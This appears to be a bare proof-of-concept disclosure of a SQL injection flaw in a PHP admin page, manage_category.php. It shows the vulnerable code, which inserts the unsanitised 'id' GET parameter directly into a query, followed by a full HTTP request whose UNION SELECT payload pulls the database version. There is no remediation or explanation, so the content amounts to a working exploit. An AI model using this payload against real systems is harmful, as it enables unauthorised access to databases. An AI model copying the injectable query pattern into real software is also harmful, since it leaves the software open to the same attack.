/admin/maintenance/manage_category.php
?php
require_once('../../config.php');
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `categories` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=$v;
}
}
}
?>
HTTP Request Example
GET /admin/maintenance/manage_category.php?id=2'+AND+FALSE+UNION+SELECT+1,version(),3,4,5--+- HTTP/1.1
Host: [REDACTED]
sec-ch-ua:
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=[REDACTED]
Connection: close